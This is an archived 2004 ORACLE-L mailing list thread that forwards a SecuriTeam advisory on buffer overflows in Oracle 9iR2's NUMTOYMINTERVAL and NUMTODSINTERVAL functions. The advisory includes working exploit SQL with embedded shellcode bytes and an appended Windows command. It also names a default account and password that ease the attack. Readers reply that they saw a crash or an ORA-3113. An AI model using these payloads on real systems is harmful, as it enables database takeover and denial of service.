Hmmmm.....
Oracle 9.2.0.3 on Win2K, shutdown the instance and the
Oracle service.
Pretty serious bug to me.
mohammed
- Jared.Still_at_radisys.com wrote:
> Has anyone here heard of this?
>
> First I've seen it. Could not get the exploit to
> work on 8i or 9i,
> haven't tried 10g.
>
> It does however cause an ORA-3113.
>
> Jared
>
> =================================
>
> The following security advisory is sent to the
> securiteam mailing list,
> and can be found at the SecuriTeam web site:
> http://www.securiteam.com
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate,
> Independent.
>
> Get your security news from a reliable source.
> http://www.securiteam.com/mailinglist.html
>
>
> - - - - - - - - -
> Oracle Database 9ir2 Interval Conversion Buffer
> Overflow
> Oracle Database Server is one of the most used
> database servers in the
> world, it was marketed as being unbreakable and many
> people thinks that is
> one of the most secure database server in the
> market.
>
> Oracle Database Server provides two functions that
> can be used with PL/SQL
> to convert numbers to date/time intervals, these
> functions have buffer
> overflow vulnerabilities.
> Vulnerable Systems:
> * Oracle Database version 9ir2 and prior
>
> When any of these conversion functions are called
> with a long string as a
> second parameter a buffer overflow occurs.
>
> To reproduce the overflow execute the next PL/SQL:
> SELECT NUMTOYMINTERVAL(1,'longstringhere') from
> dual;
> SELECT NUMTODSINTERVAL(1,'longstringhere') from
> dual;
>
> Any Oracle Database user can exploit this
> vulnerability because access to
> these functions can't be restricted. Exploitation of
> this vulnerability
> allow an attacker to execute arbitrary code, also it
> can be exploited to
> cause DOS (Denial of service) killing Oracle server
> process. An attacker
> can complete compromise the OS and database if
> Oracle is running on
> Windows platform, because Oracle must run under the
> local System account
> or under an administrative account. If Oracle is
> running on *nix then only
> the database could be compromised because Oracle
> runs mostly under oracle
> user which has restricted permissions.
>
> Important: Exploitation of these vulnerabilities
> becomes easy if Oracle Internet
> Directory has been deployed, because Oracle Internet
> Directory creates a
> database user called ODSCOMMON that has a default
> password ODSCOMMON, this
> password can not be changed, so any attacker can use
> this user to connect
> to database and exploit these vulnerabilities.
>
> Full tests on Oracle database 9ir2 under Microsoft
> Windows 2000 Server and
> Linux confirm these vulnerabilities. Versions
> running in other OS
> platforms are believed to be affected too. Previous
> Oracle Database Server
> versions could be affected by these vulnerabilities.
>
>
> Exploits:
> -- These exploits should work on Windows 2000 Server
> and Windows XP, not
> tested on Windows 2003.
> -- Run any command at the end of the string
> SELECT
>
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
> chr(59) || chr(79) || chr(150) || chr(01) ||
> chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21)
> || chr(52) || chr(35)
> || chr(148) || chr(01) || chr(255) || chr(37) ||
> chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32)||'echo ARE YOU SURE?
> >c:\Unbreakable.txt')
> ?FROM DUAL;
>
> SELECT
>
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
> chr(59) || chr(79) || chr(150) || chr(01) ||
> chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21)
> || chr(52) || chr(35)
> || chr(148) || chr(01) || chr(255) || chr(37) ||
> chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU
> SURE?
> >c:\Unbreakable.txt') ?
>
> FROM DUAL;
>
> Vendor Fix:
> Go to Oracle Metalink site,
> http://metalink.oracle.com.
>
> Vendor Contact:
> Oracle was contacted and they released a fix without
> telling the public
> nor Ceaser anything and without issuing an alert.
> Additional Information:
> The information has been provided by Cesar.
>
>
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam
> mailing list.
> To unsubscribe from the list, send mail with an
> empty subject line and
> body to: html-list-unsubscribe_at_securiteam.com
> In order to subscribe to the mailing list and
> receive advisories in HTML
> format, simply forward this email to:
> html-list-subscribe_at_securiteam.com
>
>
>
>
>
>
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS"
> without warranty of
> any kind.
> In no event shall we be liable for any damages
> whatsoever including
> direct, indirect, incidental, consequential, loss of
> business profits or
> special damages.
>
>
>
>
>
>
Do you Yahoo!?
Get better spam protection with Yahoo! Mail.
http://antispam.yahoo.com/tools
Please see the official ORACLE-L FAQ:
http://www.orafaq.com
To unsubscribe send email to: oracle-l-request_at_freelists.org
put 'unsubscribe' in the subject line.
--
Archives are at http://www.freelists.org/archives/oracle-l/
FAQ is at http://www.freelists.org/help/fom-serve/cache/1.html
-----------------------------------------------------------------
Received on Thu Feb 26 2004 - 14:31:23 CST